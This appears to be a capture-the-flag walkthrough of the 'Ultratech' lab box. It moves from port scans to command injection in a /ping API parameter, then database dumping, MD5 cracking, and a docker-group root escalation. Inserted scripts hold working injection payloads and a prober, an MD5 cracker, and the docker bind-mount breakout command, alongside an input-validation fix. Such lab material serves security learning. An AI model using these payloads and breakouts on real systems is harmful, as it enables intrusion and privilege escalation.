
Ultratech


I like to scan all ports to check which are open. nmap <ip> -p- --open

images/150-1.png

I then perform a more specific and thorough scan of the open ports (nmap takes the port list comma-separated with no spaces): nmap <ip> -p 21,22,8081,31331 -A

images/150-2.png
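The two scans above chain together naturally: the full-port sweep finds what is open, the targeted -A scan digs into only those ports. The helper below is an added example (not from the original writeup) that parses nmap's grepable output (the real -oG flag) into the comma-separated list the second command needs, so the port list never has to be retyped by hand. The -oG text it parses is a constructed sample, not the box's real scan.

```shell
#!/bin/sh
# Added example: two-stage nmap scan helper. Not from the original writeup;
# it assumes nmap was run with -oG (real flag) and that the target IP is
# supplied as $1. The SAMPLE_GNMAP text below is constructed.

# Extract open ports from an nmap grepable (-oG) file as a comma-separated
# list such as "21,22,8081,31331". nmap's -p expects no spaces after commas.
open_ports_from_gnmap() {   # open_ports_from_gnmap <file.gnmap>
    grep '^Host:' "$1" \
      | grep -o '[0-9]*/open/' \
      | cut -d/ -f1 \
      | sort -n -u \
      | paste -sd, -
}

# Build the second-stage command for the ports that were found.
thorough_scan_cmd() {   # thorough_scan_cmd <target> <ports>
    printf 'nmap %s -p %s -A\n' "$1" "$2"
}

# Constructed sample of what `nmap <ip> -p- --open -oG all.gnmap` writes.
SAMPLE_GNMAP='# Nmap 7.94 scan initiated
Host: 10.10.10.10 ()    Status: Up
Host: 10.10.10.10 ()    Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 8081/open/tcp//blackice-icecap///, 31331/open/tcp/////    Ignored State: closed (65531)
# Nmap done'

# Run the parser over the constructed sample and print the follow-up command.
demo() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_GNMAP" > "$tmp"
    ports=$(open_ports_from_gnmap "$tmp")
    rm -f "$tmp"
    thorough_scan_cmd "${1:-<ip>}" "$ports"
}

# Against a live target this is the whole workflow:
#   nmap "$1" -p- --open -oG all.gnmap
#   nmap "$1" -p "$(open_ports_from_gnmap all.gnmap)" -A
demo "$@"
```

The sort -n -u step also de-duplicates if nmap lists the same port twice (for example when a host line is repeated), so the generated -p list is always clean.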

This site seems to be using an API. It seems the Node.js Express framework is making a call to port 31331.

images/150-3.png

Note that /ping returns a 500 response, i.e. a server error.

images/150-4.png

images/150-5.png

images/150-6.png

Scanning the other port, 31331, shows some results.

images/150-7.png

Potential steganography in the JPEG.

images/150-8.png

images/150-9.png

images/150-10.png

Potential usernames. I tried to brute force the web form using ffuf.

images/150-11.png

images/150-12.png

images/150-13.png

I will create a user list and brute-force this login page.

That did not work, so I checked the hint, which told me to look closely at the /ping route on port 8081. I could see there was an ip parameter, which the server uses to reach the supplied address.

images/150-14.png

images/150-15.png

Found RCE. It took a while and multiple tries with the various commands above.

images/150-16.png
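Getting the injection to land took several attempts, so here is an added example (not from the original writeup) of how I would systematise that: build one request per separator technique for the /ping?ip= route, percent-encode it, and fire it at the target. Next to it is the input check the API should have applied before handing the value to ping, including the newline case that a naive one-line regex check misses. The host and port ($TARGET:8081), the benign base address and the list of separators are assumptions; the writeup does not say which separator worked on the box.

```shell
#!/bin/sh
# Added example, not from the writeup. Builds candidate command-injection
# requests for a /ping?ip= route and shows the input check that would have
# stopped them. Assumptions: the API is on $TARGET:8081, the parameter is
# named ip (as in the writeup), and the separators below are the generic
# ones; the writeup does not record which one worked.

# Percent-encode every byte so ; | ` $ and newline survive the query string.
# Over-encoding is harmless and keeps the function POSIX.
urlencode() {
    printf '%s' "$1" | od -An -v -tx1 | tr -d ' \n' | sed 's/../%&/g'
}

# One candidate URL per separator technique, appended to a benign address.
injection_urls() {   # injection_urls <target-host> [benign-ip]
    target="$1"; base="${2:-127.0.0.1}"
    for suffix in ';id' '|id' '&&id' '$(id)' '`id`' "$(printf '\nid')"; do
        printf 'http://%s:8081/ping?ip=%s\n' "$target" "$(urlencode "$base$suffix")"
    done
}

# Send each candidate and print the start of the body; uid= in the response
# means the parameter reaches a shell unescaped.
probe() {   # probe <target-host>
    injection_urls "$1" | while read -r url; do
        printf '>>> %s\n' "$url"
        curl -s -m 5 "$url" | head -c 200
        echo
    done
}

# What the server should have done: accept only a dotted-quad IPv4 address.
# The case pattern rejects any byte other than digits and dots, which also
# kills the newline trick; grep alone would pass "127.0.0.1\nid" because it
# matches the first line.
is_ipv4() {
    case "$1" in *[!0-9.]*|'') return 1 ;; esac
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    printf '%s\n' "$1" | awk -F. '{ for (i = 1; i <= 4; i++) if ($i > 255) exit 1 }'
}

# Validate, then pass the value as a single argument rather than via a shell.
safe_ping() {   # safe_ping <ip>
    is_ipv4 "$1" || { echo "rejected: not an IPv4 address" >&2; return 1; }
    ping -c 1 "$1"
}

if [ -n "${TARGET:-}" ] && command -v curl >/dev/null 2>&1; then
    probe "$TARGET"
fi
```

Run it as TARGET=<ip> sh probe.sh; with no TARGET set it only defines the functions, so injection_urls <ip> can be used on its own to eyeball the encoded requests first.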

Chained commands to dump the database, which contained two MD5 hashes.

images/150-17.png

Cracked the hashes; crackstation.net is cool!

images/150-18.png

images/150-19.png
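crackstation is a lookup table; the same thing can be done offline against a wordlist when the hashes are unsalted MD5, which is also what hashcat -m 0 or john --format=raw-md5 would do at scale. The script below is an added example (not from the original writeup): it pulls user:hash pairs out of dumped rows and tries a tiny wordlist against them. The rows, logins and wordlist are constructed for the demo, and the hashes are MD5 of the sample words, not the hashes from the box.

```shell
#!/bin/sh
# Added example, not from the writeup: extract MD5 hashes from dumped table
# rows and look them up against a wordlist locally. SAMPLE_DUMP and the
# wordlist are constructed; the hashes are md5("admin") and md5("hello").

# Hex MD5 of a string: md5sum (coreutils) or openssl as a fallback.
md5_hex() {   # md5_hex <string>
    if command -v md5sum >/dev/null 2>&1; then
        printf '%s' "$1" | md5sum | cut -d' ' -f1
    else
        printf '%s' "$1" | openssl md5 | sed 's/.* //'
    fi
}

# Turn each dumped row into "user:hash". A 32-hex-char token is taken as the
# MD5; the first token that looks like a name is the user. Rows without a hash
# are dropped, so sqlite3 output and `strings` on the db file both work.
extract_md5() {
    awk '{
        hash = ""; user = ""
        n = split($0, f, /[^A-Za-z0-9_]+/)
        for (i = 1; i <= n; i++) {
            if (length(f[i]) == 32 && f[i] ~ /^[0-9a-fA-F]+$/) hash = tolower(f[i])
            else if (user == "" && f[i] ~ /^[A-Za-z_][A-Za-z0-9_]*$/) user = f[i]
        }
        if (hash != "") print user ":" hash
    }'
}

# Read "user:hash" lines on stdin and try every word in the list.
crack_md5() {   # crack_md5 <wordlist-file>
    while IFS=: read -r user hash; do
        found=""
        while IFS= read -r word; do
            if [ "$(md5_hex "$word")" = "$hash" ]; then found="$word"; break; fi
        done < "$1"
        printf '%s:%s\n' "$user" "${found:-<not in wordlist>}"
    done
}

# Constructed sqlite3-style rows: id|login|password|note.
SAMPLE_DUMP='1|admin|21232f297a57a5a743894a0e4a801fc3|site admin
2|r00t|5d41402abc4b2a76b9719d911017c592|dev box
3|guest||no password set'

# Run the whole pipeline over the sample with a four-word list.
crack_sample() {
    wl=$(mktemp)
    printf '%s\n' 123456 hello admin letmein > "$wl"
    printf '%s\n' "$SAMPLE_DUMP" | extract_md5 | crack_md5 "$wl"
    rm -f "$wl"
}

crack_sample
```

For real dumps, pipe extract_md5 into a file and hand that to hashcat or john instead of the shell loop; the loop is only there to show the comparison that a cracker does.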

SSH access gained as r00t (not root).

images/150-20.png

images/150-21.png

This was definitely the time for Linpeas.

images/150-22.png

This red and yellow (linpeas' highlighting for a very likely privilege escalation vector)! Loving it.

images/150-23.png

Did my research on docker breakouts and privesc.

images/150-24.png

images/150-25.png

One change was necessary to the command I found: alpine to bash.
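As an added example (not from the original writeup), here is the check I would script for this step: confirm the foothold user is actually in the docker group, see whether the docker socket is writable, and print the standard bind-mount breakout (mount the host root into a container and chroot into it), with the shell name as a parameter since the alpine image ships sh but not bash. The /etc/group content used for the demo is constructed; the image and group names are parameters, and the breakout command is the generic technique rather than the exact one from the screenshots.

```shell
#!/bin/sh
# Added example, not from the writeup: docker-group privesc checks plus the
# standard host-root breakout command. SAMPLE_GROUP is constructed; image,
# group and shell names are parameters.

# Print the members of a group from a group(5)-format file, one per line.
group_members() {   # group_members <group-file> <group>
    awk -F: -v g="$2" '$1 == g { print $4 }' "$1" | tr ',' '\n' | sed '/^$/d'
}

# Is <user> listed as a member of <group> in <group-file>?
user_in_group() {   # user_in_group <group-file> <group> <user>
    group_members "$1" "$2" | grep -qx "$3"
}

# The classic breakout: bind-mount / into the container and chroot into it.
# alpine has sh but no bash, so the default shell is sh; pass "bash" with an
# image that ships it.
breakout_cmd() {   # breakout_cmd <image> [shell]
    printf 'docker run -v /:/mnt --rm -it %s chroot /mnt %s\n' "$1" "${2:-sh}"
}

# Read-only check on the current host: nothing is mounted or run.
check_host() {
    me=$(id -un)
    if user_in_group /etc/group docker "$me"; then
        echo "[+] $me is in the docker group; host root via:"
        breakout_cmd alpine
    else
        echo "[-] $me is not in the docker group"
    fi
    if [ -w /var/run/docker.sock ]; then
        echo "[+] /var/run/docker.sock is writable"
    fi
}

# Constructed group file: only r00t is in docker.
SAMPLE_GROUP='root:x:0:
docker:x:999:r00t
sudo:x:27:alice'

check_host
```

The -v /:/mnt mount is what makes this a full host compromise rather than a container escape: the chroot shell runs as root inside the container with the host filesystem writable, so adding an SSH key or a sudoers entry on the host is one command away.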